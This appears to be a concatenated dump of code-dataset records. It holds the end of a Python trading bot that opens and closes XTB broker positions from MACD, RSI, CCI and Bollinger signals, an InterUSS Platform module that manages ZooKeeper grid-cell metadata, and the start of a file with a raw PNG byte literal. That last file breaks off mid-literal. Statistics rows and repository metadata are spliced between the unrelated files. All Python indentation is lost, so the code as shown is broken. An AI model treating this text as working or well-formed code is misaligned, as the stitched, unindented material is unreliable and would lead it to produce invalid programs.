# If stream2 is an int or float, check if stream1 has crossed over that fixed number
if isinstance(stream2, int) or isinstance(stream2, float):
if stream1[len(stream1)-1] <= stream2:
return False
else:
if stream1[len(stream1)-2] > stream2:
return False
elif stream1[len(stream1)-2] < stream2:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2:
x = x + 1
if stream1[len(stream1)-x] < stream2:
return True
else:
return False
# Check if stream1 has crossed over stream2
else:
if stream1[len(stream1)-1] <= stream2[len(stream2)-1]:
return False
else:
if stream1[len(stream1)-2] > stream2[len(stream2)-2]:
return False
elif stream1[len(stream1)-2] < stream2[len(stream2)-2]:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2[len(stream2)-x]:
x = x + 1
if stream1[len(stream1)-x] < stream2[len(stream2)-x]:
return True
else:
return False
# Returns true if stream1 crossed under stream2 in most recent candle, stream2 can be integer/float or data array
def crossesUnder(stream1, stream2):
# If stream2 is an int or float, check if stream1 has crossed under that fixed number
if isinstance(stream2, int) or isinstance(stream2, float):
if stream1[len(stream1)-1] >= stream2:
return False
else:
if stream1[len(stream1)-2] < stream2:
return False
elif stream1[len(stream1)-2] > stream2:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2:
x = x + 1
if stream1[len(stream1)-x] > stream2:
return True
else:
return False
# Check if stream1 has crossed under stream2
else:
if stream1[len(stream1)-1] >= stream2[len(stream2)-1]:
return False
else:
if stream1[len(stream1)-2] < stream2[len(stream2)-2]:
return False
elif stream1[len(stream1)-2] > stream2[len(stream2)-2]:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2[len(stream2)-x]:
x = x + 1
if stream1[len(stream1)-x] > stream2[len(stream2)-x]:
return True
else:
return False
# This function places a market order in the direction BuySell, "B" = Buy, "S" = Sell, uses symbol, amount, stop, limit
def enter(BuySell, stop, limit):
volume = amount
order = 'buy'
if BuySell == "S":
order = 'sell'
try:
msg = ' Opening tradeID for symbol ' + symbol
NotifyLogInfo(msg)
opentrade = client.open_trade(order, symbol, amount)
except:
msg = ' Error Opening Trade.'
NotifyLogError(msg)
else:
msg = ' Trade Opened Successfully.'
LOGGER.info(msg)
# This function closes all positions that are in the direction BuySell, "B" = Close All Buy Positions, "S" = Close All Sell Positions, uses symbol
def exit(BuySell=None):
openpositions = client.get_trades()
isbuy = 0
if BuySell == "S":
isbuy = 1
for position in openpositions:
if position['symbol'] == symbol:
if BuySell is None or position['cmd'] == isbuy:
msg = ' Closing tradeID : ' + str(position['order'])
NotifyLogInfo(msg)
try:
closetrade = client.close_trade(position['order'])
except:
msg = " Error Closing Trade."
NotifyLogError(msg)
else:
msg = " Trade Closed Successfully."
LOGGER.info(msg)
# Returns number of Open Positions for symbol in the direction BuySell, returns total number of both Buy and Sell positions if no direction is specified
def countOpenTrades(BuySell=None):
openpositions = client.get_trades()
counter = 0
isbuy = 0
if BuySell == "S":
isbuy = 1
for keys in openpositions:
if keys['symbol'] == symbol:
if BuySell is None or keys['cmd'] == isbuy:
counter+=1
return counter
def Update():
print(f"{bcolors.HEADER}==================================================================================={bcolors.ENDC}")
print(f"{bcolors.BOLD}" + str(dt.datetime.now()) + f"{bcolors.ENDC}" + " " + timeframe + " Bar Closed - Running Update Function...")
print("Version : " + f"{bcolors.BOLD}" + version + ' ' + sys.argv[0] + f"{bcolors.ENDC}")
print("Symbol : " + f"{bcolors.BOLD}" + symbol + f"{bcolors.ENDC}")
# Calculate Indicators
macd = ta.MACD(pricedata['close'])
pricedata['cci'] = ta.CCI(pricedata['high'],pricedata['low'],pricedata['close'])
iBBUpper = bb.upper_bollinger_band(pricedata['close'], bb_periods, bb_standard_deviations)
iBBMiddle = bb.middle_bollinger_band(pricedata['close'], bb_periods, bb_standard_deviations)
iBBLower = bb.lower_bollinger_band(pricedata['close'], bb_periods, bb_standard_deviations)
iRSI = rsi(pricedata['close'], rsi_periods)
# Declare simplified variable names for most recent close candle
pricedata['macd'] = macd[0]
pricedata['macdsignal'] = macd[1]
pricedata['macdhist'] = macd[2]
BBUpper = iBBUpper[len(iBBUpper)-1]
BBMiddle = iBBMiddle[len(iBBMiddle)-1]
BBLower = iBBLower[len(iBBLower)-1]
close_price = pricedata['close'][len(pricedata)-1]
last_close_price = pricedata['close'][len(pricedata)-2]
macd_now = pricedata['macd'][len(pricedata)-1]
macdsignal = pricedata['macdsignal'][len(pricedata)-1]
macdhist = pricedata['macdhist'][len(pricedata)-1]
cci = pricedata['cci'][len(pricedata)-1]
rsi_now = iRSI[len(iRSI)-1]
## DEBUG FULL
#print(pricedata.to_string())
# Print Price/Indicators
if close_price > last_close_price:
print(f"Close Price : {bcolors.OKGREEN}" + str(close_price) + f"{bcolors.ENDC}")
elif close_price < last_close_price:
print(f"Close Price : {bcolors.FAIL}" + str(close_price) + f"{bcolors.ENDC}")
else:
print(f"Close Price : {bcolors.OKCYAN}" + str(close_price) + f"{bcolors.ENDC}")
print("MACD : " + str(macd_now))
print("Signal MACD : " + str(macdsignal))
print("MACD History : " + str(macdhist))
if cci <= -50:
print(f"{bcolors.OKGREEN}CCI : " + str(cci) + f"{bcolors.ENDC}")
elif cci >= 100:
print(f"{bcolors.FAIL}CCI : " + str(cci) + f"{bcolors.ENDC}")
else:
print(f"{bcolors.OKCYAN}CCI : " + str(cci) + f"{bcolors.ENDC}")
print("RSI : " + str(rsi_now))
# Change Any Existing Trades' Limits to Middle Bollinger Band
if countOpenTrades()>0:
openpositions = client.get_trades()
for position in openpositions:
if position['symbol'] == symbol and ((position['cmd'] == 0) or (position['cmd'] == 1)):
NotifyLogInfo("Changing Limit for tradeID: " + str(position['order']))
try:
NotifyLogInfo('client.trade_transaction')
#client.trade_transaction(symbol, position['cmd'], trans_type, volume, stop_loss=0, take_profit=0)
except:
NotifyLogError(" Error Changing Limit :(")
else:
print(" Limit Changed Successfully. ;)")
# # Entry Logic
# if countOpenTrades('B') == 0:
# if ((crossesOver(pricedata['macd'], macdsignal) & (cci <= -50.0))):
# print(f"{bcolors.OKGREEN} BUY SIGNAL ! MACD{bcolors.ENDC}")
# NotifyLogInfo(" Opening " + symbol + " Buy Trade... MACD")
# stop = round((pricedata['close'][len(pricedata['close'])-1] * buy_stop_loss), 5)
# limit = round((pricedata['close'][len(pricedata['close'])-1] * buy_take_profit), 5)
# #enter('B', stop, limit)
# elif (crossesOver(iRSI, lower_rsi) and close_price < BBLower):
# print(f"{bcolors.OKGREEN} BUY SIGNAL ! RSI{bcolors.ENDC}")
# NotifyLogInfo(" Opening " + symbol + " Buy Trade... RSI")
# #stop = pricedata['close'][len(pricedata['close'])-1] - (BBMiddle - pricedata['close'][len(pricedata['close'])-1])
# stop = round((pricedata['close'][len(pricedata['close'])-1] * buy_stop_loss), 5)
# limit = BBMiddle
# #enter('B', stop, limit)
# if (countOpenTrades('S') == 0 and close_price > BBUpper):
# if crossesUnder(iRSI, upper_rsi):
# print(f"{bcolors.FAIL} SELL SIGNAL ! RSI{bcolors.ENDC}")
# NotifyLogInfo(' Opening ' + symbol + ' Sell Trade... RSI')
# stop = pricedata['close'][len(pricedata['close'])-1] + (pricedata['close'][len(pricedata['close'])-1] - BBMiddle)
# limit = BBMiddle
# #enter('S', stop, limit)
# elif (crossesUnder(pricedata['macd'], macdsignal) and macd_now > 0):
# print(f"{bcolors.FAIL} SELL SIGNAL ! MACD{bcolors.ENDC}")
# NotifyLogInfo(' Opening ' + symbol + ' Sell Trade... MACD')
# stop = pricedata['close'][len(pricedata['close'])-1] + (pricedata['close'][len(pricedata['close'])-1] - BBMiddle)
# limit = BBMiddle
# #enter('S', stop, limit)
# # Exit Logic
# if countOpenTrades('B') > 0:
# if ((crossesUnder(pricedata['macd'], macdsignal) & (cci >= 100.0))):
# NotifyLogInfo(' Closing ' + symbol + ' Buy Trade(s)... Reason : MACD')
# #exit('B')
# elif (crossesUnder(iRSI, upper_rsi)):
# NotifyLogInfo(' Closing ' + symbol + ' Buy Trade(s)... Reason : RSI')
# #exit('B')
# if countOpenTrades('S') > 0:
# if (iRSI[len(iRSI)-1] < lower_rsi):
# NotifyLogInfo(' Closing ' + symbol + ' SELL Trade because of RSI')
# #exit('S')
# elif (close_price < BBMiddle):
# NotifyLogInfo(' Closing ' + symbol + ' SELL Trade because of BBMiddle')
# #exit('S')
print(f"{bcolors.BOLD}" + str(dt.datetime.now()) + f"{bcolors.ENDC}" + " " + timeframe + " Update Function Completed.\n")
def handle_exception():
NotifyLogError("Exception handled on " + symbol + " ! Restarting...")
main()
## STARTING TRADING LOOP
def main():
try:
Prepare()
StrategyHeartBeat()
except KeyboardInterrupt:
print("")
print(f"{bcolors.WARNING}Shutdown requested by Operator... Exiting !{bcolors.ENDC}")
print("")
NormalExit()
except Exception:
traceback.print_exc(file=sys.stdout)
LOGGER.error("EXCEPTION on Bot XTB " + symbol + " ! Bot Stopped.")
handle_exception()
except ServerError:
traceback.print_exc(file=sys.stdout)
NotifyLogError("SERVER ERROR on Bot XTB " + symbol + " ! Bot Stopped.")
handle_exception()
if __name__ == "__main__":
main()
NormalExit()
| 40.459459 | 152 | 0.590874 | 1,798 | 0.09239 | 0 | 0 | 0 | 0 | 0 | 0 | 7,124 | 0.366065 |
1fa915f1d01ae50c5c5d775a6b404ccefbb0a1db
| 23,609 |
py
|
Python
|
datanode/src/storage_interface.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | null | null | null |
datanode/src/storage_interface.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 1 |
2021-03-26T12:13:17.000Z
|
2021-03-26T12:13:17.000Z
|
datanode/src/storage_interface.py
|
isabella232/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 2 |
2019-08-11T20:20:32.000Z
|
2021-03-26T12:01:43.000Z
|
"""The InterUSS Platform Data Node storage API server.
This flexible and distributed system is used to connect multiple USSs operating
in the same general area to share safety information while protecting the
privacy of USSs, businesses, operator and consumers. The system is focused on
facilitating communication amongst actively operating USSs with no details about
UAS operations stored or processed on the InterUSS Platform.
A data node contains all of the API, logic, and data consistency infrastructure
required to perform CRUD (Create, Read, Update, Delete) operations on specific
grid cells. Multiple data nodes can be executed to increase resilience and
availability. This is achieved by a stateless API to service USSs, an
information interface to translate grid cell USS information into the correct
data storage format, and an information consistency store to ensure data is up
to date.
This module is the information interface to Zookeeper.
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the 'License');
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an 'AS IS' BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import logging
# Our data structure for the actual metadata stored
import uss_metadata
# Utilties for validating slippy
import slippy_util
# Kazoo is the zookeeper wrapper for python
from kazoo.client import KazooClient
from kazoo.exceptions import KazooException
from kazoo.exceptions import BadVersionError
from kazoo.exceptions import NoNodeError
from kazoo.exceptions import RolledBackError
from kazoo.handlers.threading import KazooTimeoutError
from kazoo.protocol.states import KazooState
# logging is our log infrastructure used for this application
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)
log = logging.getLogger('InterUSS_DataNode_InformationInterface')
# CONSTANTS
# Lock stores in this format /uss/gridcells/{z}/{x}/{y}/manifest
USS_BASE_PREFIX = '/uss/gridcells/'
TEST_BASE_PREFIX = '/test/'
USS_METADATA_FILE = '/manifest'
BAD_CHARACTER_CHECK = '\';(){}[]!@#$%^&*|"<>'
CONNECTION_TIMEOUT = 2.5 # seconds
DEFAULT_CONNECTION = 'localhost:2181'
GRID_PATH = USS_BASE_PREFIX
MAX_SAFE_INTEGER = 9007199254740991
class USSMetadataManager(object):
"""Interfaces with the locking system to get, put, and delete USS metadata.
Metadata gets/stores/deletes the USS information for a partiular grid,
including current version number, a list of USSs with active operations,
and the endpoints to get that information. Locking is assured through a
snapshot token received when getting, and used when putting.
"""
def __init__(self, connectionstring=DEFAULT_CONNECTION, testgroupid=None):
"""Initializes the class.
Args:
connectionstring:
Zookeeper connection string - server:port,server:port,...
testgroupid:
ID to use if in test mode, none for normal mode
"""
if testgroupid:
self.set_testmode(testgroupid)
if not connectionstring:
connectionstring = DEFAULT_CONNECTION
log.debug('Creating metadata manager object and connecting to zookeeper...')
try:
if set(BAD_CHARACTER_CHECK) & set(connectionstring):
raise ValueError
self.zk = KazooClient(hosts=connectionstring, timeout=CONNECTION_TIMEOUT)
self.zk.add_listener(self.zookeeper_connection_listener)
self.zk.start()
if testgroupid:
self.delete_testdata(testgroupid)
except KazooTimeoutError:
log.error('Unable to connect to zookeeper using %s connection string...',
connectionstring)
raise
except ValueError:
log.error('Connection string %s seems invalid...', connectionstring)
raise
def __del__(self):
log.debug('Destroying metadata manager object and disconnecting from zk...')
self.zk.stop()
def get_state(self):
return self.zk.state
def get_version(self):
try:
return True, self.zk.server_version()
except KazooException as e:
msg = str(e)
return False, type(e).__name__ + (' ' + msg if msg else '')
def set_verbose(self):
log.setLevel(logging.DEBUG)
def set_testmode(self, testgroupid='UNDEFINED_TESTER'):
"""Sets the mode to testing with the specific test ID, cannot be undone.
Args:
testgroupid: ID to use if in test mode, none for normal mode
"""
global GRID_PATH
global CONNECTION_TIMEOUT
# Adjust parameters specifically for the test
GRID_PATH = TEST_BASE_PREFIX + testgroupid + USS_BASE_PREFIX
log.debug('Setting test path to %s...', GRID_PATH)
CONNECTION_TIMEOUT = 1.0
def zookeeper_connection_listener(self, state):
if state == KazooState.LOST:
# Register somewhere that the session was lost
log.error('Lost connection with the zookeeper servers...')
elif state == KazooState.SUSPENDED:
# Handle being disconnected from Zookeeper
log.error('Suspended connection with the zookeeper servers...')
elif state == KazooState.CONNECTED:
# Handle being connected/reconnected to Zookeeper
log.info('Connection restored with the zookeeper servers...')
def delete_testdata(self, testgroupid=None):
"""Removes the test data from the servers.
Be careful when using this in parallel as it removes everything under
the testgroupid, or everything if no tetgroupid is provided.
Args:
testgroupid: ID to use if in test mode, none will remove all test data
"""
if testgroupid:
path = TEST_BASE_PREFIX + testgroupid
else:
path = TEST_BASE_PREFIX
self.zk.delete(path, recursive=True)
def get(self, z, x, y):
"""Gets the metadata and snapshot token for a GridCell.
Reads data from zookeeper, including a snapshot token. The
snapshot token is used as a reference when writing to ensure
the data has not been updated between read and write.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
# TODO(hikevin): Change to use our own error codes and let the server
# convert them to http error codes. For now, this is
# at least in a standard JSend format.
status = 500
if slippy_util.validate_slippy(z, x, y):
(content, metadata) = self._get_raw(z, x, y)
if metadata:
try:
m = uss_metadata.USSMetadata(content)
status = 200
result = {
'status': 'success',
'sync_token': metadata.last_modified_transaction_id,
'data': m.to_json()
}
except ValueError:
status = 424
else:
status = 404
else:
status = 400
if status != 200:
result = self._format_status_code_to_jsend(status)
return result
def set(self, z, x, y, sync_token, uss_id, ws_scope, operation_format,
operation_ws, earliest_operation, latest_operation):
"""Sets the metadata for a GridCell.
Writes data, using the snapshot token for confirming data
has not been updated since it was last read.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
sync_token: token retrieved in the original GET GridCellMetadata,
uss_id: plain text identifier for the USS,
ws_scope: scope to use to obtain OAuth token,
operation_format: output format for operation ws (i.e. NASA, GUTMA),
operation_ws: submitting USS endpoint where all flights in
this cell can be retrieved from,
earliest_operation: lower bound of active or planned flight timestamp,
used for quick filtering conflicts.
latest_operation: upper bound of active or planned flight timestamp,
used for quick filtering conflicts.
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
if slippy_util.validate_slippy(z, x, y):
# first we have to get the cell
(content, metadata) = self._get_raw(z, x, y)
if metadata:
# Quick check of the token, another is done on the actual set to be sure
# but this check fails early and fast
if str(metadata.last_modified_transaction_id) == str(sync_token):
try:
m = uss_metadata.USSMetadata(content)
log.debug('Setting metadata for %s...', uss_id)
if not m.upsert_operator(uss_id, ws_scope, operation_format,
operation_ws, earliest_operation,
latest_operation, z, x, y):
log.error('Failed setting operator for %s with token %s...',
uss_id, str(sync_token))
raise ValueError
status = self._set_raw(z, x, y, m, metadata.version)
except ValueError:
status = 424
else:
status = 409
else:
status = 404
else:
status = 400
if status == 200:
# Success, now get the metadata back to send back
result = self.get(z, x, y)
else:
result = self._format_status_code_to_jsend(status)
return result
def delete(self, z, x, y, uss_id):
"""Sets the metadata for a GridCell by removing the entry for the USS.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
uss_id: is the plain text identifier for the USS
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
status = 500
if slippy_util.validate_slippy(z, x, y):
# first we have to get the cell
(content, metadata) = self._get_raw(z, x, y)
if metadata:
try:
m = uss_metadata.USSMetadata(content)
m.remove_operator(uss_id)
# TODO(pelletierb): Automatically retry on delete
status = self._set_raw(z, x, y, m, metadata.version)
except ValueError:
status = 424
else:
status = 404
else:
status = 400
if status == 200:
# Success, now get the metadata back to send back
(content, metadata) = self._get_raw(z, x, y)
result = {
'status': 'success',
'sync_token': metadata.last_modified_transaction_id,
'data': m.to_json()
}
else:
result = self._format_status_code_to_jsend(status)
return result
def get_multi(self, z, grids):
"""Gets the metadata and snapshot token for multiple GridCells.
Reads data from zookeeper, including a composite snapshot token. The
snapshot token is used as a reference when writing to ensure
the data has not been updated between read and write.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to retrieve
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
try:
combined_meta, syncs = self._get_multi_raw(z, grids)
log.debug('Found sync token %s for %d grids...',
self._hash_sync_tokens(syncs), len(syncs))
result = {
'status': 'success',
'sync_token': self._hash_sync_tokens(syncs),
'data': combined_meta.to_json()
}
except ValueError as e:
result = self._format_status_code_to_jsend(400, e.message)
except IndexError as e:
result = self._format_status_code_to_jsend(404, e.message)
return result
def set_multi(self, z, grids, sync_token, uss_id, ws_scope, operation_format,
operation_ws, earliest_operation, latest_operation):
"""Sets multiple GridCells metadata at once.
Writes data, using the hashed snapshot token for confirming data
has not been updated since it was last read.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to update
sync_token: token retrieved in the original get_multi,
uss_id: plain text identifier for the USS,
ws_scope: scope to use to obtain OAuth token,
operation_format: output format for operation ws (i.e. NASA, GUTMA),
operation_ws: submitting USS endpoint where all flights in
this cell can be retrieved from,
earliest_operation: lower bound of active or planned flight timestamp,
used for quick filtering conflicts.
latest_operation: upper bound of active or planned flight timestamp,
used for quick filtering conflicts.
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
log.debug('Setting multiple grid metadata for %s...', uss_id)
try:
# first, get the affected grid's sync tokens
m, syncs = self._get_multi_raw(z, grids)
del m
# Quick check of the token, another is done on the actual set to be sure
# but this check fails early and fast
log.debug('Found sync token %d for %d grids...',
self._hash_sync_tokens(syncs), len(syncs))
if str(self._hash_sync_tokens(syncs)) == str(sync_token):
log.debug('Composite sync_token matches, continuing...')
self._set_multi_raw(z, grids, syncs, uss_id, ws_scope, operation_format,
operation_ws, earliest_operation, latest_operation)
log.debug('Completed updating multiple grids...')
else:
raise KeyError('Composite sync_token has changed')
combined_meta, new_syncs = self._get_multi_raw(z, grids)
result = {
'status': 'success',
'sync_token': self._hash_sync_tokens(new_syncs),
'data': combined_meta.to_json()
}
except (KeyError, RolledBackError) as e:
result = self._format_status_code_to_jsend(409, e.message)
except ValueError as e:
result = self._format_status_code_to_jsend(400, e.message)
except IndexError as e:
result = self._format_status_code_to_jsend(404, e.message)
return result
def delete_multi(self, z, grids, uss_id):
"""Sets multiple GridCells metadata by removing the entry for the USS.
Removes the operator from multiple cells. Does not return 404 on
not finding the USS in a cell, since this should be a remove all
type function, as some cells might have the ussid and some might not.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to delete
uss_id: is the plain text identifier for the USS
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
log.debug('Deleting multiple grid metadata for %s...', uss_id)
try:
if not uss_id:
raise ValueError('Invalid uss_id for deleting multi')
for x, y in grids:
if slippy_util.validate_slippy(z, x, y):
(content, metadata) = self._get_raw(z, x, y)
if metadata:
m = uss_metadata.USSMetadata(content)
m.remove_operator(uss_id)
# TODO(pelletierb): Automatically retry on delete
status = self._set_raw(z, x, y, m, metadata.version)
else:
raise ValueError('Invalid slippy grids for lookup')
result = self.get_multi(z, grids)
except ValueError as e:
result = self._format_status_code_to_jsend(400, e.message)
return result
######################################################################
################ INTERNAL FUNCTIONS #########################
######################################################################
def _get_raw(self, z, x, y):
"""Gets the raw content and metadata for a GridCell from zookeeper.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
Returns:
content: USS metadata
metadata: straight from zookeeper
"""
path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y),
USS_METADATA_FILE)
log.debug('Getting metadata from zookeeper@%s...', path)
try:
c, m = self.zk.get(path)
except NoNodeError:
self.zk.ensure_path(path)
c, m = self.zk.get(path)
if c:
log.debug('Received raw content and metadata from zookeeper: %s', c)
if m:
log.debug('Received raw metadata from zookeeper: %s', m)
return c, m
def _set_raw(self, z, x, y, m, version):
"""Grabs the lock and updates the raw content for a GridCell in zookeeper.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
m: metadata object to write
version: the metadata version verified from the sync_token match
Returns:
200 for success, 409 for conflict, 408 for unable to get the lock
"""
path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y),
USS_METADATA_FILE)
try:
log.debug('Setting metadata to %s...', str(m))
self.zk.set(path, json.dumps(m.to_json()), version)
status = 200
except BadVersionError:
log.error('Sync token updated before write for %s...', path)
status = 409
return status
def _get_multi_raw(self, z, grids):
"""Gets the raw content and metadata for multiple GridCells from zookeeper.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to retrieve
Returns:
content: Combined USS metadata
syncs: list of sync tokens in the same order as the grids
Raises:
IndexError: if it cannot find anything in zookeeper
ValueError: if the grid data is not in the right format
"""
log.debug('Getting multiple grid metadata for %s...', str(grids))
combined_meta = None
syncs = []
for x, y in grids:
if slippy_util.validate_slippy(z, x, y):
(content, metadata) = self._get_raw(z, x, y)
if metadata:
combined_meta += uss_metadata.USSMetadata(content)
syncs.append(metadata.last_modified_transaction_id)
else:
raise IndexError('Unable to find metadata in platform')
else:
raise ValueError('Invalid slippy grids for lookup')
if len(syncs) == 0:
raise IndexError('Unable to find metadata in platform')
return combined_meta, syncs
def _set_multi_raw(self, z, grids, sync_tokens, uss_id, ws_scope,
operation_format, operation_ws, earliest_operation, latest_operation):
"""Grabs the lock and updates the raw content for multiple GridCells
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to retrieve
sync_tokens: list of the sync tokens received during get operation
uss_id: plain text identifier for the USS,
ws_scope: scope to use to obtain OAuth token,
operation_format: output format for operation ws (i.e. NASA, GUTMA),
operation_ws: submitting USS endpoint where all flights in
this cell can be retrieved from,
earliest_operation: lower bound of active or planned flight timestamp,
used for quick filtering conflicts.
latest_operation: upper bound of active or planned flight timestamp,
used for quick filtering conflicts.
Raises:
IndexError: if it cannot find anything in zookeeper
ValueError: if the grid data is not in the right format
"""
log.debug('Setting multiple grid metadata for %s...', str(grids))
try:
contents = []
for i in range(len(grids)):
# First, get and update them all in memory, validate the sync_token
x = grids[i][0]
y = grids[i][1]
sync_token = sync_tokens[i]
path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y),
USS_METADATA_FILE)
(content, metadata) = self._get_raw(z, x, y)
if str(metadata.last_modified_transaction_id) == str(sync_token):
log.debug('Sync_token matches for %d, %d...', x, y)
m = uss_metadata.USSMetadata(content)
if not m.upsert_operator(uss_id, ws_scope, operation_format,
operation_ws, earliest_operation,
latest_operation, z, x, y):
raise ValueError('Failed to set operator content')
contents.append((path, m, metadata.version))
else:
log.error(
'Sync token from USS (%s) does not match token from zk (%s)...',
str(sync_token), str(metadata.last_modified_transaction_id))
raise KeyError('Composite sync_token has changed')
# Now, start a transaction to update them all
# the version will catch any changes and roll back any attempted
# updates to the grids
log.debug('Starting transaction to write all grids at once...')
t = self.zk.transaction()
for path, m, version in contents:
t.set_data(path, json.dumps(m.to_json()), version)
log.debug('Committing transaction...')
results = t.commit()
if isinstance(results[0], RolledBackError):
raise KeyError('Rolled back multi-grid transaction due to grid change')
log.debug('Committed transaction successfully.')
except (KeyError, ValueError, IndexError) as e:
log.error('Error caught in set_multi_raw %s.', e.message)
raise e
def _format_status_code_to_jsend(self, status, message=None):
"""Formats a response based on HTTP status code.
Args:
status: HTTP status code
message: optional message to override preset message for codes
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
if status == 200 or status == 204:
result = {'status': 'success', 'code': 204, 'message': 'Empty data set.'}
elif status == 400:
result = {
'status': 'fail',
'code': status,
'message': 'Parameters are not following the correct format.'
}
elif status == 404:
result = {
'status': 'fail',
'code': status,
'message': 'Unable to pull metadata from lock system.'
}
elif status == 408:
result = {
'status': 'fail',
'code': status,
'message': 'Timeout trying to get lock.'
}
elif status == 409:
result = {
'status':
'fail',
'code':
status,
'message':
'Content in metadata has been updated since provided sync token.'
}
elif status == 424:
result = {
'status':
'fail',
'code':
status,
'message':
'Content in metadata is not following JSON format guidelines.'
}
else:
result = {
'status': 'fail',
'code': status,
'message': 'Unknown error code occurred.'
}
if message:
result['message'] = message
return result
@staticmethod
def _hash_sync_tokens(syncs):
"""Hashes a list of sync tokens into a single, positive 64-bit int.
For various languages, the limit to integers may be different, therefore
we truncate to ensure the hash is the same on all implementations.
"""
return abs(hash(tuple(sorted(syncs)))) % MAX_SAFE_INTEGER
| 38.264182 | 80 | 0.656275 | 21,020 | 0.890338 | 0 | 0 | 336 | 0.014232 | 0 | 0 | 12,793 | 0.54187 |
1fa9bd99cc0cefda66b99c89d32eb998269a611a
| 32,069 |
py
|
Python
|
snape/flicker.py
|
SuryaThiru/snape
|
3402af05ad2ccba958888befa5177a4850adbf7f
|
[
"Apache-2.0"
] | 182 |
2016-12-14T21:09:42.000Z
|
2022-03-04T03:39:46.000Z
|
snape/flicker.py
|
SuryaThiru/snape
|
3402af05ad2ccba958888befa5177a4850adbf7f
|
[
"Apache-2.0"
] | 15 |
2016-12-06T18:37:08.000Z
|
2020-07-31T17:30:00.000Z
|
core/flicker.py
|
slizb/iglu
|
888ec9009431b50a47fe009f8ac13638b6547745
|
[
"Apache-2.0"
] | 30 |
2017-01-19T19:24:37.000Z
|
2021-12-06T10:23:04.000Z
|
junk_image1 = b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\xf4\x00\x00\x01v\x08\x00\x00\x00\x00\xbd\xc55\x85\x00\x00\x07\xcaIDATx\x01\xec\xd9m\xeb\xd2P\x1c\xc6\xf1\xff\xfb\x7f)g\xe1)oB\x0ef\x92\xe2\xcd\n\x94\xac\xa8\x19Ef\xa93l\xd8\xb4:n\xfe\xba\xda\xa6\xab\xe7\xff\'\x1e\xaf/x\xcdm\x0f?0\x06\xbb\xdb\xb2\x9b\xebn+\xec\xc6":\xd1\x19\xd1\x19\xd1\x19\xd1\x19\xd1\x19\xd1\x19\xd1\xd9}\x17\xf5\xb4\xf2F\xf2\xcc\x98\xb6D\xe3\xf1x)e_\x8c1\x9f\x88\xee\\{\xad\xd0P\xeaJiY\xe0\xef+)\xfb\x88\xf3\xc09t6\x85km0#\xfa-\xd5\x85\xebN$G\xff\x15\x86a\xec8:\xb3\xb6\rWk\x8f9zj\xadM\xe4o\xbb\xd5zwAOp\xf9\x98\xc6q\xfcS\xa2\xc5\x86\xe8W\x9e*\xea\xfd\xf7xO\xdfT\x15j\x14\xe8I\x13\x87\xc5wL\xab\x8bq\x11\x9d\xe8\xb6\xa5\xb2\xaa\x05\xfa\x04;\x11\xa0gi\xa2_y\xbe\xff\x10\x8e\xbe\x1f\xfc\x8b\xfe\x1c\xeb\xf5_\x0e;9z\x88y\x92^\xd0\xebD\xbf\xfaL\xf1\xc0.\xd1\x7f{\xd8%.\x9d2\xf4\xd7\xb8\xf3\xe8 9\xba\x9e\xad\xbf:\x88N\xf4\x15\xa6S\xbe\xbdW\xf0[I\x81\xfe\xc1\xcd\xb7w\xa2\xcf1~\x89\xae\xf1\x9b\x9f\xd1\x0fn\xa2\x13}\x83i\x9e.\xe8S\x8d;\xe7\xc7\xbb%\xba\x9b\xe8\xa9\xc6\xbe8\x8a\xec3\xf4\xe0-\xa6\xe36:\xd1%P\xa8\xd2z\xac\x92\x0c=m`\xdf\xb9\x8dNt\x99\xa8<\x9b\xa1\xcbg\xec\x83\xc8\x1dt60\xc6\xe0\x90\x7fZ]\xe3\xe4=N\xbe\x8dj\xca\xab\xf6\x92\xe2\xd3j\x1f\x87\xd1\x8f\xa7\xe8\x0f;w\xb3\xda6\x10\x05`\xf4\xfd_\xe5\x92(\xf4\x87&V\xf0\xc2\tz\to\xda\x85\x1f ?\xc5\x91l\x8c\x1ar\x17\x85\xc9N\x85\x82f\xce\xb7\x1a\x06\xb4: 